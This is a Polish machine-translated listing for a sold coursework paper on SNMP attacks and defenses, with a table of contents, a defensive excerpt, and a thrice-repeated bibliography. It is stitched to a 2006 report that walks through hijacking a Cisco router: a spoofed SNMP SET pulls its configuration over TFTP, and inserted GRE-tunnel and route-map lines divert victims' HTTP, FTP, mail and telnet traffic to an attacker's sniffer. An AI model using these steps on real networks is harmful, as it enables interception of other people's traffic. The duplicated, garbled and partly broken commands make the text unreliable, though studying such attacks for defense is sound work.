Metody ataków sieciowych i ochrony protokołu SNMP. protokół SNMP. Po wykonaniu skryptu pakiet SNMP zostanie przechwycony. Zgodnie z oczekiwaniami to żądanie zostało odrzucone przez router, a plik konfiguracyjny nie został wysłany.
1 180 rub.
ZAWARTOŚĆ
WSTĘP 3
1. UZASADNIENIE TEORETYCZNE PROBLEMU BADANIA METOD ATAKU NA PROTOKOŁU SNMP
1.1 POTRZEBA BADANIA METOD ATAKU SNMP 5
1.2 PROTOKÓŁ SNMP: OPIS, CEL 7
2. ANALIZA ATAKU NA PROTOKOŁ SNMP I METODY ZAPOBIEGANIA
2.1 TECHNIKI ATAKU SNMP I ICH ZAPOBIEGANIE 11
2.2 JAK ODPOWIADAĆ NA ATAKI SNMP 15
WNIOSEK 20
WYKAZ WYKORZYSTYWANYCH ŹRÓDEŁ 21
Fragment pracy do recenzji
Rysunek 3 - Formularz ekranowy narzędzia SoftPerfectNetworkScanner urządzenia sieciowe opracować tzw. łatki, których użycie jest konieczne w przypadku wykrycia luk w systemie. Tak więc, jeśli znajdziesz w swojej sieci urządzenia obsługujące SNMP, dobrym pomysłem jest skontaktowanie się z producentami tych urządzeń, aby sprawdzić, czy opracowali niezbędne łatki.Wyłączanie usługi SNMP Wiele osób uważa, że jeśli usługa SNMP nie jest potrzebny, należy go wyłączyć lub usunąć. Oto algorytm wyłączania usługi SNMP w system operacyjny Windows: Wybór menu Start - Panel sterowania - Narzędzia administracyjne - Usługi (patrz rys. 4). Wybierz usługę SNMP. Jeśli usługa jest uruchomiona, kliknij przycisk „Zatrzymaj”, a następnie wybierz „Typ uruchomienia” - „Wyłączone”, nawet gdy protokół SNMP jest wyłączony. 162. Zapobiegnie to inicjowanym przez sieć zewnętrzną atakom na podatne urządzenia w lokalna sieć. Inne porty obsługujące usługi związane z SNMP, w tym porty TCP i UDP 161, 162, 199, 391, 750 i 1993, mogą również wymagać filtrowania ruchu przychodzącego.Filtrowanie ruchu wychodzącego na portach UDP 161 i 162 na brzegu sieci może uniemożliwić systemowi jest używany jako trampolina do ataku. Systemy wykrywania i zapobiegania włamaniom System wykrywania włamań (IDS) to oprogramowanie lub sprzęt, który wykrywa zdarzenia nieautoryzowanego dostępu (wtargnięcia lub ataku sieciowego) do systemu komputerowego lub sieci. Bez IDS infrastruktura staje się nie do pomyślenia bezpieczeństwo sieci. Oprócz zapór sieciowych, które działają w oparciu o reguły bezpieczeństwa, systemy IDS monitorują i obserwują podejrzaną aktywność. Pozwalają one zidentyfikować intruzów, którzy przeniknęli przez zaporę i zgłosić to administratorowi, który podejmie niezbędną decyzję o utrzymaniu bezpieczeństwa. Metody wykrywania włamań nie gwarantują pełnego bezpieczeństwa systemu.W wyniku korzystania z IDS osiągane są następujące cele: identyfikacja ataku sieciowego lub włamania, przewidywanie prawdopodobnych przyszłych ataków i identyfikacja słabości systemu, aby zapobiec ich użyciu. W wielu przypadkach atakujący wykonuje fazę przygotowawczą, taką jak sondowanie (skanowanie) sieci lub inne jej testowanie w celu wykrycia podatności systemu, dokumentowanie znanych zagrożeń, monitorowanie jakości wykonywanej administracji z punktu widzenia bezpieczeństwa, w szczególności i złożonych sieci, uzyskanie cennych informacji o zaistniałych włamaniach w celu przywrócenia i skorygowania czynników, które doprowadziły do penetracji, zidentyfikowanie lokalizacji źródła ataku z punktu widzenia sieci zewnętrznej (ataki zewnętrzne lub wewnętrzne), co pozwala na podejmowanie właściwych decyzji podczas rozmieszczania węzłów sieci.W ogólnym przypadku IDS zawiera: monitoring, który zbiera informacje o zdarzeniach związanych z bezpieczeństwem chronionej sieci lub systemu podsystem analizy wykrywający podejrzane działania i ataki sieciowe pamięć masowa przechowująca podstawowe zdarzenia i wyniki analiz, konsola zarządzania do konfiguracji IDS, monitorowania stanu chronionego systemu my i IDS, badając sytuacje wykryte przez podsystem analizy.Podsumowując, zauważamy, że prostota popularnego protokołu SNMP skutkuje zwiększoną podatnością. Ponieważ SNMP jest tak szeroko stosowany, wykorzystywanie sieci z podatnymi produktami może być katastrofalne. Dlatego, aby efektywnie korzystać z protokołu SNMP, należy użyć różne drogi w celu zapobiegania atakom i budowy kompleksowego systemu ochrony WNIOSKI Praca poświęcona jest zagadnieniom zapewnienia bezpieczeństwa organizacji interakcji sieciowej poprzez protokół SNMP. W toku prac zidentyfikowano cechy nazwanego protokołu i możliwe problemy z jego wykorzystaniem. Aby uzasadnić problem, dostarczane są dane statystyczne potwierdzające wysokie prawdopodobieństwo ataków sieciowych. Ponadto część teoretyczna zawiera informacje o strukturze protokołu, schemacie żądanie/odpowiedź oraz o krokach uzyskiwania odpowiedzi na żądania. Praca semestralna przeprowadzono analizę możliwych ataków na protokół SNMP, wśród których znalazły się ataki Dos, ataki przepełnienia bufora oraz wykorzystanie podatności typu format string. Potencjalnych zagrożeń jest oczywiście znacznie więcej, ale ich przegląd zapewnia głębsze i bardziej kompleksowe badanie.W celu zbudowania systemu ochrony interakcji sieciowych abonentów sieci rozważono metody zapobiegania atakom na protokół SNMP i zauważono, że skuteczne byłoby użycie zestawu narzędzi.Na podstawie przeprowadzonej analizy stwierdzono, że protokół SNMP jest dość podatny na ataki, a jeśli mimo wszystko zostanie podjęta decyzja o jego użyciu, należy opracować politykę bezpieczeństwa i wszystkie jej zasady Można zatem stwierdzić, że cel został osiągnięty, a zadania określone we wstępie zostały zrealizowane. prawo federalne Federacja Rosyjska z dnia 27 lipca 2006 r. N 149-FZ W sprawie informacji, technologia informacyjna i ochrona informacji Wykaz literatury specjalistycznej i naukowej Blank-Edelman D. Perl do administrowania systemem, M.: symbol-Plus, 2009.- 478. Borodakiy V.Yu. Praktyka i perspektywy tworzenia bezpiecznej chmury informacyjnej i obliczeniowej opartej na MSS OGV/V.Yu. Borodaki, A.Yu. Dobrodeev, P.A. Nashchekin // Aktualne problemy rozwoju technologicznych systemów ochrony państwa, specjalna komunikacja i specjalne wsparcie informacyjne: VIII ogólnorosyjski międzyresortowy Konferencja naukowa: materiały i raporty (Orel, 13-14 lutego 2013). - O godzinie 10, część 4 / wyd. W.W. Mizerowa. - Orzeł: Akademia FSO Rosji, 2013. Organizacja Grishina N. V. zintegrowany system ochrona informacji. - M .: Helios ARV, 2009. - 256 s, Douglas R. Mauro SNMP Fundamentals, wydanie 2 / Douglas R. Mauro, Kevin J. Schmidt - M .: Symbol-Plus, 2012.-725 s. Kulgin M.V. Sieć komputerowa. Praktyka budowlana. Dla profesjonalistów, St. Petersburg: Piotr, lata 2003-462. Mulyukha V.A. Metody i środki ochrony informacje o komputerze. Firewall: Podręcznik / Mulyukha V.A., Novopashenny A.G., Podgursky Yu.E. - Petersburg: SPbGPU Publishing House, 2010. - 91 p. Olifer V. G., Olifer N. P. Sieci komputerowe. Zasady, technologie, protokoły. - 4 miejsce. - Petersburg: Piotr, 2010. -902s. Technologie przełączania i routingu w języku lokalnym sieć komputerowa: instruktaż/ SmirnowaE. V. i inne; wyd. AV Proletariacki. - M.: Wydawnictwo MSTU im. N.E. Bauman, 2013. - 389 s. Flenov M. Linux oczami hakera, St. Petersburg: BHV-St. Petersburg, 2005. - 544 s. Horeev P.V. Metody i środki ochrony informacji w systemach komputerowych. - M .: Centrum wydawnicze „Akademia”, 2005. -205 s. Khoroshko V. A., Chekatkov A. A. Metody i środki bezpieczeństwa informacji, K .: Junior, 2003. - 504 s. Źródła internetowe IDS / IPS - Wykrywanie i zapobieganie włamaniom do systemów [ Zasób elektroniczny] URL: http://netconfig.ru/server/ids-ips/ Analiza zagrożeń internetowych w 2014 roku. Ataki DDoS. Hakowanie stron internetowych [Zasoby elektroniczne]. URL: http://onsec.ru/resources/Internet%20threats%20in%202014.%20Overview%20by%20Qrator-Wallarm.pdfKolischak A. Usterka ciągu formatującego [zasób elektroniczny]. URL: https://securityvulns.ru/articles/fsbug.aspFirst Mile, nr 04, 2013 [Zasoby elektroniczne]. URL: http://www.lastmile.su/journal/article/3823 Rodzina standardów SNMP [Zasoby elektroniczne]. URL: https://en.wikibooks.org/wiki /SNMP_Standard_FamilyForeign Literature"CERT Advisory CA-2002-03: Multiple Vulnerabilities in Many Implementations of the Simple Network Management Protocol (SNMP)", 12 lutego. 2002, (obecnie 11 marca 2002)
Bibliografia
LISTA WYKORZYSTYWANYCH ŹRÓDEŁ
Przepisy prawne
1. Ustawa federalna Federacji Rosyjskiej z dnia 27 lipca 2006 r. N 149-FZ w sprawie informacji, technologii informacyjnych i ochrony informacji
Wykaz literatury specjalistycznej i naukowej
2. Blank-Edelman D. Perl do administrowania systemem, M.: Plus symbol, 2009.- 478s.
3. Borodaki V.Yu. Praktyka i perspektywy tworzenia bezpiecznej chmury informacyjnej i obliczeniowej w oparciu o MSS OGV/V.Yu. Borodaki, A.Yu. Dobrodeev, P.A. Nashchekin // Aktualne problemy rozwoju technologicznych systemów ochrony państwa, komunikacji specjalnej i specjalnego wsparcia informacyjnego: VIII Ogólnorosyjska Międzywydziałowa Konferencja Naukowa: materiały i raporty (Orel, 13–14 lutego 2013 r.). - O godzinie 10, część 4 / wyd. W.W. Mizerowa. - Orzeł: Akademia FSO Rosji, 2013.
4. Grishina N. V. Organizacja złożonego systemu bezpieczeństwa informacji. - M.: Helios ARV, 2009r. - 256 s,
5. Douglas R. Mauro Podstawy SNMP, wydanie 2 / Douglas R. Mauro, Kevin J. Schmidt - M.: Symbol-Plus, 2012.-725p.
6. Kulgin M.V. Sieć komputerowa. Praktyka budowlana. Dla profesjonalistów, St. Petersburg: Peter, 2003.-462p.
7. Mulyukha V.A. Metody i środki ochrony informacji komputerowych. Firewall: Podręcznik / Mulyukha V.A., Novopashenny A.G., Podgursky Yu.E. - St. Petersburg: Wydawnictwo SPbSPU, 2010. - 91 s.
8. Olifer V.G., Olifer N.P. Sieci komputerowe. Zasady, technologie, protokoły. - 4 miejsce. - Petersburg: Piotr, 2010. -902s.
9. Technologie przełączania i routingu w lokalnych sieciach komputerowych: podręcznik / Smirnova E. V. i inne; wyd. AV Proletariacki. - M.: Wydawnictwo MSTU im. N.E. Bauman, 2013. - 389p.
10. Flenov M. Linux oczami hakera, St. Petersburg: BHV-St. Petersburg, 2005. - 544 s.
11. Khoreev P.V. Metody i środki ochrony informacji w systemach komputerowych. - M.: Ośrodek Wydawniczy „Akademia”, 2005. -205 s.
12. Khoroshko V. A., Chekatkov A. A. Metody i środki bezpieczeństwa informacji, K .: Junior, 2003. - 504 s.
Źródła internetowe
13. IDS/IPS - Systemy wykrywania i zapobiegania włamaniom [Zasób elektroniczny] URL: http://netconfig.ru/server/ids-ips/.
14. Analiza zagrożeń internetowych w 2014 roku. Ataki DDoS. Hakowanie stron internetowych [Zasoby elektroniczne]. URL: http://onsec.ru/resources/Internet%20threats%20in%202014.%20Overview%20by%20Qrator-Wallarm.pdf
15. Kolischak A. Podatność ciągu formatującego [Zasób elektroniczny]. URL: https://securityvulns.ru/articles/fsbug.asp
16. First Mile, No. 04, 2013 [Zasoby elektroniczne]. URL: http://www.lastmile.su/journal/article/3823
17. Rodzina standardów SNMP [Zasób elektroniczny]. URL: https://ru.wikibooks.org/wiki /SNMP_Standard_Family
Literatura zagraniczna
18. „CERT Advisory CA-2002-03: Wiele usterek w wielu implementacjach prostego protokołu zarządzania siecią (SNMP)”, 12 lutego. 2002, (obecnie 11 marca 2002)
Prosimy o dokładne przestudiowanie treści i fragmentów pracy. Pieniądze za zakupione gotowe prace z powodu niezgodności tej pracy z Państwa wymaganiami lub jej unikatowości nie podlegają zwrotowi.
*Kategoria prac jest szacowana zgodnie z parametrami jakościowymi i ilościowymi dostarczonego materiału. Niniejszy materiał ani w całości, ani w żadnej jego części nie jest ukończoną pracą naukową, końcową pracą kwalifikacyjną, raportem naukowym lub inną przewidzianą pracą system państwowy certyfikacja naukowa lub niezbędna do zaliczenia certyfikacji pośredniej lub końcowej. Materiał ten jest subiektywnym wynikiem przetwarzania, strukturyzacji i formatowania informacji zebranych przez jego autora i ma służyć przede wszystkim jako źródło do samodzielnego przygotowania pracy na ten temat.
WNIOSEK
Opracowanie poświęcone jest zagadnieniom zapewnienia bezpieczeństwa organizacji interakcji sieciowej poprzez protokół SNMP. W toku prac zidentyfikowano cechy nazwanego protokołu i możliwe problemy z jego wykorzystaniem. Aby uzasadnić problem, dostarczane są dane statystyczne potwierdzające wysokie prawdopodobieństwo ataków sieciowych. Ponadto część teoretyczna zawiera informacje o strukturze protokołu, schemacie żądanie/odpowiedź oraz o krokach uzyskiwania odpowiedzi na żądania.
W ramach zajęć przeprowadzono analizę możliwych ataków na protokół SNMP, wśród których znalazły się ataki Dos, ataki z przepełnieniem bufora oraz wykorzystywanie podatności na ciąg formatowania. Potencjalnych zagrożeń jest oczywiście znacznie więcej, ale ich przegląd zapewnia głębsze i bardziej wszechstronne badania. ani.
W celu zbudowania systemu ochrony interakcji sieciowych abonentów sieci rozważano sposoby zapobiegania atakom na protokół SNMP i zauważono, że skuteczne byłoby użycie zestawu narzędzi.
Na podstawie analizy okazało się, że protokół SNMP jest dość podatny na ataki i jeśli mimo wszystko zostanie podjęta decyzja o jego użyciu, należy opracować politykę bezpieczeństwa i przestrzegać wszystkich jej zasad.
Można zatem stwierdzić, że cel został osiągnięty, a zadania określone we wstępie rozwiązane.
WPROWADZANIE
Nowoczesny, szybki rozwój technologii informatycznych stawia nowe wymagania w zakresie przechowywania, przetwarzania i rozpowszechniania danych. Z tradycyjnych nośników pamięci i serwerów dedykowanych firmy i osoby prywatne stopniowo przechodzą na technologie zdalne wdrażane poprzez sieć globalna Internet. Usługi w Internecie mogą stać się niezbędnymi narzędziami funkcjonowania nowoczesnej, dynamicznie rozwijającej się firmy, do których należą m.in.: e-mail; wymiana plików, wiadomości głosowych i danych za pomocą aplikacji wideo; rozwój własnych zasobów internetowych.
Zdaniem wielu ekspertów powszechne wykorzystanie technologii internetowych wymaga zbudowania efektywnego systemu zarządzania urządzeniami sieciowymi, którego jednym z narzędzi może być stać się protokołem SNMP. Jednak organizacja kontroli i monitorowania urządzeń sieciowych za pośrednictwem tego protokołu sprawia, że elementy sieci są podatne na ataki. Tym samym kwestie technologii zapobiegania atakom sieciowym w świetle rozwoju usług internetowych wysuwają się na pierwszy plan i wymagają kompleksowej analizy. Dlatego temat badań jest istotny.
Pytania wielu autorów poświęcone są zagadnieniom budowy systemu ochrony przed atakami na protokół SNMP, nie ma jednak zgody co do celowości wykorzystania SNMP ze względu na złożoność zabezpieczeń. Tak więc Flenov M. w swojej książce „Linux oczami hakera” zwrócił uwagę na wady tego protokołu i nie zaleca jego stosowania. Smirnowa E. B. W podręczniku „Technologie przełączania i routingu w lokalnych sieciach komputerowych” podano informacje na temat schematów transmisji danych multicast i skutecznego zarządzania sprzęt sieciowy za pomocą protokołu SNMP, a także osobno zwraca uwagę na kwestie bezpieczeństwa jego użytkowania. Dalszy przegląd literatury specjalistycznej i źródeł internetowych potwierdził potrzebę zbadania zagadnień bezpiecznego stosowania protokołu SNMP w celu podjęcia decyzji o zasadności jego wykorzystania. ta decyzja będzie analiza możliwych ataków i skuteczności metod ich zapobiegania.
Celem badania jest przeprowadzenie kompleksowej analizy możliwych ataków na protokół SNMP oraz sposobów ich przeciwdziałania.
Aby osiągnąć cel, konieczne jest rozwiązanie szeregu zadań:
1. Dokonać przeglądu literatury i źródeł internetowych dotyczących organizacji bezpiecznej interakcji sieciowej w oparciu o wykorzystanie protokołu SNMP.
2. Uzasadnij potrzebę zbadania metod ataków na protokół SNMP i sposobów ich zapobiegania.
3. Zaznacz funkcje zarządzania oparte na protokole SNMP.
4. Przeanalizuj techniki dla protokołu SNMP.
5. Opisać metody zapobiegania atakom na protokół SNMP.
Przedmiotem badań jest protokół SNMP.
Przedmiotem badań są metody ataków sieciowych na protokół SNMP oraz sposoby ich zapobiegania.
Metody badawcze: analiza, synteza, badanie źródeł informacji.
Praca kursu składa się ze wstępu, dwóch rozdziałów i zakończenia. Rozdział pierwszy poświęcony jest teoretycznemu uzasadnieniu problemu. Drugi rozdział zawiera analizę możliwych ataków i sposobów ich zapobiegania.
ZAWARTOŚĆ
WSTĘP 3
1. UZASADNIENIE TEORETYCZNE PROBLEMU BADANIA METOD ATAKU NA PROTOKOŁU SNMP
1.1 POTRZEBA BADANIA METOD ATAKU SNMP 5
1.2 PROTOKÓŁ SNMP: OPIS, CEL 7
2. ANALIZA ATAKU NA PROTOKOŁ SNMP I METODY ZAPOBIEGANIA
2.1 TECHNIKI ATAKU SNMP I ICH ZAPOBIEGANIE 11
2.2 JAK ODPOWIADAĆ NA ATAKI SNMP 15
WNIOSEK 20
WYKAZ WYKORZYSTYWANYCH ŹRÓDEŁ 21
LISTA WYKORZYSTYWANYCH ŹRÓDEŁ
Przepisy prawne
1. Ustawa federalna Federacji Rosyjskiej z dnia 27 lipca 2006 r. N 149-FZ w sprawie informacji, technologii informacyjnych i ochrony informacji
Wykaz literatury specjalistycznej i naukowej
2. Blank-Edelman D. Perl do administrowania systemem, M.: Plus symbol, 2009.- 478s.
3. Borodaki V.Yu. Praktyka i perspektywy tworzenia bezpiecznej chmury informacyjnej i obliczeniowej opartej na MSS OGV/V.Yu. Borodaki, A.Yu. Dobrodeev, P.A. Nashchekin // Aktualne problemy rozwoju technologicznych systemów ochrony państwa, komunikacji specjalnej i specjalnego wsparcia informacyjnego: VIII Ogólnorosyjska Międzyresortowa Konferencja Naukowa: materiały i raporty (Orel, 13-14 lutego 2013 r.). - O godz.10 Część 4 / Pod redakcją generalną. W.W. Mizerowa. - Orzeł: Akade Misja Federalnej Służby Bezpieczeństwa Rosji, 2013.
4. Grishina N. V. Organizacja złożonego systemu bezpieczeństwa informacji. - M.: Helios ARV, 2009r. - 256 s,
5. Douglas R. Mauro Podstawy SNMP, wydanie 2 / Douglas R. Mauro, Kevin J. Schmidt - M.: Symbol-Plus, 2012.-725s.
6. Kulgin M.V. Sieć komputerowa. Praktyka budowlana. Dla profesjonalistów, St. Petersburg: Peter, 2003.-462p.
7. Mulyukha V.A. Metody i środki ochrony informacji komputerowych. Firewall: Podręcznik / Mulyukha V.A., Novopashenny A.G., Podgursky Yu.E. - St. Petersburg: Wydawnictwo SPbSPU, 2010. - 91 s.
8. Olifer V.G., Olifer N.P. Sieci komputerowe. Zasady, technologie, protokoły. - 4 miejsce. - Petersburg: Piotr, 2010. -902s.
9. Technologie przełączania i routingu w lokalnych sieciach komputerowych: podręcznik / Smirnova E. V. i inne; wyd. AV Proletariacki. - M.: Wydawnictwo MSTU im. N.E. Bauman, 2013. - 389s.
10. Flenov M. Linux oczami hakera, St. Petersburg: BHV-St. Petersburg, 2005. - 544 s.
11. Khoreev P.V. Metody i środki ochrony informacji w systemach komputerowych. - M.: ośrodek wydawniczy „Akademia”, 2005. -205 s.
12. Khoroshko V. A., Chekatkov A. A. Metody i środki bezpieczeństwa informacji, K .: Junior, 2003. - 504 s.
Źródła internetowe
13. IDS/IPS - Systemy wykrywania i zapobiegania włamaniom [Zasób elektroniczny] URL: http://netconfig.ru/server/ids-ips/.
14. Analiza zagrożeń internetowych w 2014 roku. Ataki DDoS. Hakowanie stron internetowych [Zasoby elektroniczne]. URL: http://onsec.ru/resources/Internet%20threats%20in%202014.%20Overview%20by%20Qrator-Wallarm.pdf
15. Kolischak A. Podatność ciągu formatującego [Zasób elektroniczny]. URL: https://securityvulns.ru/articles/fsbug.asp
16. First Mile, No. 04, 2013 [Zasoby elektroniczne]. URL: http://www.lastmile.su/journal/article/3823
17. Rodzina standardów SNMP [Zasób elektroniczny]. URL: https://ru.wikibooks.org/wiki /SNMP_Standard_Family
Literatura zagraniczna
18. „CERT Advisory CA-2002-03: Wiele usterek w wielu implementacjach prostego protokołu zarządzania siecią (SNMP)”, 12 lutego. 2002, (obecnie 11 marca 2002 r.
Bezpieczeństwo informacji - 2006
Raport
SNMP to wygodny protokół
lub zagrożenie dla sieci firmowej
- tłoSNMP
Protokół SNMP (Simple Network Management Protocol) udostępnia metody zarządzania zasobami sieciowymi.
Historia protokołu SNMP (Simple Network Management Protocol) rozpoczyna się od jego poprzednika SGMP (Simple Gateway Monitoring Protocol), który został zdefiniowany w RFC 1028 w 1987 roku. SGMP został zaprojektowany jako tymczasowe rozwiązanie do zarządzania siecią.
Standard SGMP zdefiniował podstawowy model projektowy używany w SNMP, opisując protokół SGMP tylko w zakresie wyszukiwania i/lub zmiany zmiennych przechowywanych na routerze. Ten standard wyróżnia się również niewielką liczbą operacji, które nadal stanowią podstawę operacji SNMP.
Pierwsza wersja struktury SNMP, SNMPv1, została zdefiniowana w RFC 1067 (później zrewidowana w RFC 1098 i 1157) w 1993 roku.
Nowa specyfikacja SNMPv2 została wydana w 1996 roku i zawierała ulepszenia, takie jak mechanizm blokowania, liczniki 64-bitowe i ulepszony komunikat o błędzie.
Najnowszy dodatek do protokołu, SNMPv3, został zdefiniowany w 1999 roku. Zasadniczo jest to ten sam SNMPv2, ale z ulepszeniami w zakresie bezpieczeństwa, takimi jak: Model bezpieczeństwa (model ochrony) i Model kontroli dostępu (model kontroli dostępu).
- Wydajna kontrola sieci
SNMP może być używany do zarządzania dowolnym systemem podłączonym do Internetu
Koszty wdrożenia SNMP są minimalne
Definiując nowy Zarządzane obiekty» (MIB), możliwości zarządzania można łatwo rozszerzyć
SNMP jest dość solidny; nawet w przypadku niepowodzeń w pracy kierownik może kontynuować pracę (chociaż może być potrzebny nieco większy wysiłek)
Producenci urządzeń komunikacyjnych obecnie domyślnie włączają SNMP. Protokół ten stał się najważniejszym standardem zarządzania siecią.
- JestSNMPto jest zagrożenie?
W zależności od wersji standardu SNMP i prawidłowych ustawień sprzętowych, protokół ten może być wykorzystywany w wielu gałęziach hakerstwa, od drobnego chuligaństwa po skuteczne szpiegostwo przemysłowe.
Często administratorzy systemu nie znają SNMP. Ze względu na nieokreślone pojęcie celu tego protokołu, a co za tym idzie nieznajomość potencjału możliwe problemy, kwestie bezpieczeństwa są często pomijane.
Fakt, że SNMP jest oparty na UDP, czyni go jeszcze bardziej interesującym. Jako protokół bezpołączeniowy, UDP jest podatny na ataki IP spoofing. Jeśli Twoja organizacja posiada sprzęt Cisco, możesz sprawdzić, co możesz z nim zrobić za pomocą protokołu SNMP.
Scenariusz ataku 1.
Poniżej znajduje się aktualna konfiguracja zaatakowanego routera (Victim Router):
Aktualna konfiguracja: 1206 bajtów
włącz sekret 5 $1$h2iz$DHYpcqURF0APD2aDuA. YX0
interfejs Ethernet0/0
interfejs Ethernet0/1
adres IP 192.168.0
sieć 192.168.1.0
ip nat wewnątrz listy źródeł 102 interfejs Przeciążenie Ethernet0/0
brak serwera http ip
lista dostępu 1 zezwolenie 192.168.
Access-list 102 zezwalaj na ip dowolny
publiczna społeczność snmp-server RO
snmp-server społeczność prywatna RW 1
serwer snmp włącz pułapki tty
logowanie synchroniczne
Zwróć uwagę na regułę dostępu dla grupy RW. Ta reguła próbuje ograniczyć dostęp SNMP do odczytu/zapisu tylko do użytkowników w sieci lokalnej (192.168.1.0).
Istnieją dwa główne etapy ataku:
Pomiń reguły dostępu SNMP na zaatakowanym routerze w celu uzyskania dostępu do pliku konfiguracyjnego routera. Utworzenie tunelu GRE pomiędzy zaatakowanym routerem a routerem hakera w celu zdalnego przechwytywania ruchu atakowanego maszyna klienta(Klient ofiary).
Teoria
Za pomocą polecenia SNMP SET można wymusić na routerze Cisco zamianę/wysłanie pliku konfiguracyjnego za pomocą protokołu TFTP.
Wysyłając żądanie SNMP SET z fałszywym adresem IP (z zakresu opisanego w RFC10), musimy wymusić na zaatakowanym routerze przesłanie nam swojego pliku konfiguracyjnego. Zakłada to, że znamy „ciąg społeczności prywatnej” i listy ACL opisane w ciągu konfiguracyjnym grupy RW.
Pomiń reguły dostępu SNMP
Zacznijmy od stworzenia fałszywego żądania SNMP. Używając małego skryptu Perla i Ethereala, przechwycimy standardowe SNMP ZESTAW żądanie"copy config", którego użyjemy jako pakietu podstawowego.
[e-mail chroniony]# ./copy-router-config. pl
######################################################
# Skopiuj konfigurację routera Cisco — za pomocą SNMP
# Zhakowany przez niemieckie - *****@***co. il
#######################################################
Sposób użycia: ./cisco-copy-config. pl
Upewnij się, że skonfigurowany jest serwer TFTP, najlepiej działający z /tmp!
Po wykonaniu skryptu pakiet SNMP zostanie przechwycony. Zgodnie z oczekiwaniami to żądanie zostało odrzucone przez router i nie wysłano pliku konfiguracyjnego.
Zwróć uwagę na adres IP atakującego (80.179.76.227). Teraz za pomocą edytora szesnastkowego zmienimy ten adres IP i kilka innych pól w nagłówku pakietu. W system szesnastkowy obliczenie sfałszowanego adresu IP 192.168.1.5 wygląda jak C0 A8
Następnie wyślemy pakiet za pomocą file2cable (lub dowolnego innego generatora pakietów).
Pakiet omija reguły dostępu SNMP i poprzez TFTP otrzymujemy plik konfiguracyjny zaatakowanego routera.
Tunel GRE
GRE (Generic Routing Encapsulation) to protokół tunelowania zaprojektowany do enkapsulacji dowolnych typów pakietów warstwy sieciowej w pakiecie warstwy sieciowej. Jedną z opcji korzystania z GRE jest łączenie segmentów sieci IPX za pośrednictwem kanału komunikacyjnego, który obsługuje tylko warstwę sieciową modelu OSI. W takim przypadku konieczne będzie utworzenie tunelu GRE z jednego routera do drugiego, aby przesyłać pakiety IPX tam iz powrotem przez łącze tylko IP.
Będziemy jednak używać GRE do celów innych niż jego zwykły cel. Nasz plan jest następujący:
- Utwórz tunel GRE z zaatakowanego routera do routera hakera. Określ, jaki ruch będzie przechodził przez tunel. Rozpakuj pakiety GRE pochodzące z atakowanego routera i przekaż je do komputera atakującego (sniffera) w celu analizy.
Zaatakowany router
Musimy stworzyć tunel GRE na zaatakowanym routerze. Ponieważ nie mamy dostępu do terminala (konsoli), możemy po prostu edytować powstały plik konfiguracyjny, a następnie odesłać go z powrotem do routera za pomocą fałszywego żądania SNMP SET. Dodajmy następujące wiersze do pliku konfiguracyjnego zaatakowanego routera:
tunel interfejsu0
adres IP 192.168.10
źródło tunelu Ethernet0/0
tunel docelowy
tryb tunelowy gre ip
Mają na myśli:
- Stworzyliśmy interfejs tunel0 i określiliśmy adres IP z sieci 192.168.10.x. Aby się komunikować, oba końce tunelu muszą znajdować się w tej samej podsieci. Wskazaliśmy, że interfejs Ethernet0/0 jest początkiem tunelu (w przeciwnym razie skąd mógłby się zaczynać tunel?) Końcem tunelu jest adres IP zewnętrznego interfejsu routera hakera. Ostatnia komenda jest opcjonalna, ponieważ tunel GRE i tak jest tworzony domyślnie (ale dodaliśmy go dla pewności).
Teraz możemy skonfigurować listy dostępu, aby określić rodzaj ruchu przechodzącego przez tunel i mapy routingu (mapy tras) potrzebne do przekierowania ruchu.
Aby to zrobić, dodaj jeszcze kilka linijek do pliku konfiguracyjnego atakowanego routera:
access-list 101 zezwalaj na tcp dowolny dowolny eq 443
access-list 101 zezwalaj na tcp dowolny dowolny eq 80
access-list 101 zezwalaj tcp na dowolne eq 21
access-list 101 zezwalaj na tcp dowolne dowolne równanie 20
access-list 101 zezwalaj na tcp dowolne dowolne eq 23
access-list 101 zezwalaj na tcp dowolne dowolne eq 25
access-list 101 zezwalaj na tcp dowolne dowolne eq 110
Zezwoliliśmy na przesyłanie danych za pomocą protokołów SSL, HTTP, FTP, telnet, SMTP i POP3.
Teraz, jeśli ruch będzie zgodny z opisanymi powyżej regułami, zostanie przekierowany zgodnie z mapami routingu, których opis należy dodać do pliku konfiguracyjnego:
router-map divert traffic
dopasuj adres IP 101
ustaw następny skok ip 192.168.10.2
interfejs Ethernet0/0
polityka ip trasa-mapa przekierowania-ruchu
- Stworzyliśmy regułę dostępu, która zezwala na wszystkie rodzaje ruchu. Stworzyliśmy mapę routingu przekierowania do sniffera (ta mapa routingu przekieruje ruch tunelowany do sniffera). Utworzona reguła dostępu jest używana jako warunek dopasowania. Jako adres następnego skoku określiliśmy adres IP atakującego (sniffera). Zastosowaliśmy mapę routingu do interfejsu tunnel0.
Bardzo ważne jest, abyśmy używali mapy routingu do przekierowywania danych. Router odbiera tunelowane dane zawarte w pakiecie GRE i bez zdekodowania pakietu nie możemy go zobaczyć. Przekazując odebrane pakiety do atakującego (sniffera), router przesyła je jako zwykłe pakiety IP bez enkapsulacji GRE.
Na koniec stwórzmy mapę routingu i skojarzmy ją z interfejsem Ethernet0/0:
Atakujący(config-if)# przekierowanie mapy trasy
Atakujący(config-route-map)# pasuje do adresu IP 101
Atakujący(config-route-map)# ustaw ip next-hop 192.168.10.1
Atakujący(config-route-map)# exit
Atakujący(config)# interfejs ethernet0/0
Atakujący(config-if)# ip policy route-map divert-out
Te dodatkowe ustawienia oznaczają:
- Gdy atakujący (sniffer) przechwyci i prześle z powrotem tunelowane dane, mapa routingu przekierowania przekieruje ruch z powrotem do zaatakowanego routera. Zastosowaliśmy mapę routingu do interfejsu Ethernet.
Zacznijmy atak
Po zakończeniu wszystkich ustawień pozostaje nam tylko wgrać nowy zmodyfikowany plik konfiguracyjny do zaatakowanego routera. Efektem będzie aktywacja tunelu GRE i przekierowanie całego ruchu z sieci lokalnej zaatakowanego komputera do hakera (sniffera).
Możesz sprawdzić, czy tunel działa, wysyłając polecenie debugowania do routera atakującego:
Atakujący# tunel debugowania
-> 212.199.145.242, tos=0x0
*3 marca 06:38: Tunel 0: GRE/IP do klasyfikacji 212.199.145.242
->80.179.20.55 (len=108 typ=0x800 ttl=253 tos=0x0)
*3 marca 06:38: Tunel 0: naprawa sąsiedztwa, 80.179.20.55
-> 212.199.145.242, tos=0x0g wszystko
W wyniku tych działań Ethereal na komputerze atakującego otrzyma następujące pakiety:
https://pandia.ru/text/78/194/images/image006_20.jpg" width="624" height="468">
Kilka godzin później otrzymujemy dane ze skanowania:
Otrzymane dane zawierają następujące rodzaje informacji:
- SysName - możesz znaleźć adres, numer telefonu abonenta
- Adres IP agenta -
